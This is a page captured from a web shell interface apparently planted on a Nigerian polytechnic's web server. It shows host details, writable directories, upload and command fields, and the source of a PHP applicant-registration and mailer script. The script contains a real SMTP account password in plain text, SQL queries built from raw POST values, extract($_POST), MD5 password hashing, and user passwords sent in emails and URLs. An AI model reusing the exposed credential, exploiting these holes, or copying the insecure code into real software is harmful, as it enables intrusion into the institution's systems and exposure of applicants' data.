403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.70.127.136
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/ace_entranceForm/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/ace_entranceForm/sampleMail.php
<?php
ob_start();
require_once('../connect.php');
$db=db_connect();
extract($_POST);
if ($formTypea=='utmeFormn'){
    die("An Error Occured");
}

$trans=substr($phoneNumber,7);
$sql=$db->query("select * from ace_entrancetable where gsm='$phoneNumber' and formType='$formTypea'");
$sql_fetch=$sql->fetch(PDO::FETCH_BOTH);
$num_phone=$sql->rowCount();
if ($num_phone>0){
    header('location:createAccount.php?id=5');
}elseif ($pass1<>$pass2) {
    header('location:createAccount.php?id=1');
}elseif (strlen($trans)<>4) {
    header('location:createAccount.php?id=3');
    //  echo count($trans);
}elseif ($dept==0) {
    header('location:createAccount.php?id=4');
}else {
    $transID = mt_rand(100000, 999999) . $trans;
    $surName = str_replace("'", "''", $surName);
    $otherNames = str_replace("'", "''", $otherNames);
    $pass2 = md5($pass1);
    /*   echo $formTypea.'<br>';
       echo $surName.'<br>';
       echo $otherNames.'<br>';
       echo $pass2.'<br>';
       echo $phoneNumber.'<br>';
       echo $eMail.'<br>';
       echo $dept.'<br>';
       echo $transID.'<br>';*/

// $sql_a->execute();
//INSERT INTO `entrancetable` (`sn`, `surname`, `othernames`, `password`, `gsm`, `email`, `course`, `transID`, `dateCreated`, `formType`, `dept`, `formNo`) VALUES (NULL, 'wq', '1', '2', '3', '4', '5', '6', CURRENT_TIMESTAMP, '7', '8', '9');

    $sql_query = "INSERT INTO ace_entrancetable (`sn`, `surname`, `othernames`, `password`, `gsm`, `email`, `course`, `transID`,`formType`,`dept`,`formNo`) VALUES (?,?,?,?,?,?,?,?,?,?,?)";
    $sql_a = $db->prepare($sql_query);
    $sql_a->execute([NULL, $surName, $otherNames, $pass2, $phoneNumber, $eMail, $dept, $transID, $formTypea, $dept, '']);

// $sql_a = $db->query("INSERT INTO `fedpoly`.`entrancetable` (`sn`, `surname`, `othernames`, `password`, `gsm`, `email`, `course`, `transID`,`formType`,`dept`,`formNo`)
//VALUES (NULL, '$surName', '$otherNames', '$pass2', '$phoneNumber', '$eMail', '$dept', '$transID','$formTypea','$dept','')");
//  $result = mysql_query($sql);
    if ($sql_a) {
        $message = "<img src='../images/ace_logoOriginal_color.png'><h2><br>Your Account Created Successfully</h2>";

//    $message="<img src='http://federalpolyede.edu.ng/images/ace_logo.png'><h2><br>Your Account Created Successfully</h2>";
        $message .= "<br><b>Name:</b> " . strtoupper($surName) . " " . $otherNames;
        $message .= " <br><b>Transaction ID:</b> " . $transID;
        $message .= " <br><b>Password:</b> " . $pass1;
        $message .= " <br><b>Date:</b> " . DATE("d-m-y H:i:s");

        $sql_dept = $db->query("select * from dept where sn=$dept");
        $sql_fetch_dept = $sql_dept->fetch(PDO::FETCH_BOTH);
        $deptName = $sql_fetch_dept['dOption'];
        $message .= "<br><b>Department:</b> " . $deptName;
        $message .= "<a href=login_process.php?user=" . $transID . "&pass=" . $pass1 . "><p>Click Here to Proceed</a>";
//        $message.="<a href=http://federalpolyede.edu.ng/ace_entranceForm/login_process.php?user=".$transID ."&pass=".$pass1."><p>Click Here to Proceed</a>";
//        $message.="<a href=login_process.php?user=".$transID ."&pass=".$pass1."><p>Click Here to Proceed</a>";
        $message = str_replace("\n.", "\n..", $message);

    }
// support functions
    require('../PHPMailer/src/PHPMailer.php');
    require('../PHPMailer/src/SMTP.php');
    require('../PHPMailer/src/Exception.php');

    $mail = new PHPMailer\PHPMailer\PHPMailer();
//
//

    function SendSMTPLoginMail($email, $username, $pwd,$names,$deptName)
    {
//    $mailmsg = "<strong><u>PORTAL LOGIN INFORMATION</u></strong><BR>";
//    $mailmsg .= "<p>Dear $username,</p>Please find below the access credential to ICT Portal.<br>";
//    $mailmsg .= "<br>Password: $pwd";
//    $mailmsg .= "<br><br>Please make sure you change this password immediately you logged in.";
//    $mailmsg .= "<br><br>Thanks you.";
        $mailmsg = "<img src='http://federalpolyede.edu.ng/images/ace_logoOriginal_color.png'><h2><br>Your Account Created Successfully</h2>";
        $mailmsg .= "<strong><u>ACCOUNT CREATION DETAILS</u></strong><BR>";
        $mailmsg .= "<p>Dear $names,</p><br>Please find below the access credential to ICT Portal.<br>";
//        $mailmsg .="Dear ". $names;
    $mailmsg .= "<p>Transaction ID: $username<br>";
    $mailmsg .= "<br>Password: $pwd";
        $mailmsg .= "<br>Course : $deptName";
        $mailmsg .= "<a href=http://federalpolyede.edu.ng/ace_entranceForm/login_process.php?user=" . $username . "&pass=" . $pwd . "><p>Click Here to Proceed</a>";
//        $message.="<a href=http://federalpolyede.edu.ng/ace_entranceForm/login_process.php?user=".$transID ."&pass=".$pass1."><p>Click Here to Proceed</a>";
//        $message.="<a href=login_process.php?user=".$transID ."&pass=".$pass1."><p>Click Here to Proceed</a>";
        $mailmsg .= "<br><br>Thanks you.";
        $mailmsg = str_replace("\n.", "\n..", $mailmsg);
        //
        $reply = SMTPSendMail($email, $mailmsg);
        return $reply;
    }

//

    function SMTPSendMail($email, $mailmsg)
    {
        //Create a new PHPMailer instance
        global $mail;
        //Tell PHPMailer to use SMTP
        $mail->isSMTP();
        $mail->Host = 'mail.federalpolyede.edu.ng';
        //Set the SMTP port number - likely to be 25, 465 or 587
        $mail->Port = 25;
        //Whether to use SMTP authentication
        $mail->SMTPAuth = true;
        // Set email format to HTML
        $mail->isHTML(true);
        //Username to use for SMTP authentication
        $mail->Username = '[email protected]';
        //Password to use for SMTP authentication
        $mail->Password = 'Ku~8h1m9';
        //Set who the message is to be sent from
        $mail->setFrom('[email protected]', 'ICT Tech Support');
        //Set who the message is to be sent to
        $mail->addAddress($email, 'User Feedback');
        //Set the subject line
        $mail->Subject = 'Federal Poly Account Information';
        //Read an HTML message body from an external file, convert referenced images to embedded,
        //convert HTML into a basic plain-text alternative body
        $mail->msgHTML($mailmsg);
        //Replace the plain text body with one created manually
        $retvalue = "";


        if (!$mail->send())
//            echo "am here";
            $retvalue = 'Mailer Error: ' . $mail->ErrorInfo;
        else

            $retvalue = "OK";
        //
        return $retvalue;
    }

//
    if ($sql_a) {
//        $aspoa_fetch = $aspoa->fetch(PDO::FETCH_BOTH);
        $email = $eMail;
//        $email = '[email protected]';
        $transID = $transID;
        $pass2= $pass2;
        $names=strtoupper($surName) . " " . $otherNames;
        $deptName=$deptName;
//        $atNo = $aspoa_fetch['matNo'];

        SendSMTPLoginMail($email, $transID, $pass1,$names,$deptName);
    }
    echo $message;
}
ob_end_flush();
?>
<div style="color: #FF0000;"><h1>Write Down Your Details Before You Proceed</h1></div>
<form>

    <input type="button"  value="Click to Print" onclick="print()" >
</form>

Youez - 2016 - github.com/yon3zu
LinuXploit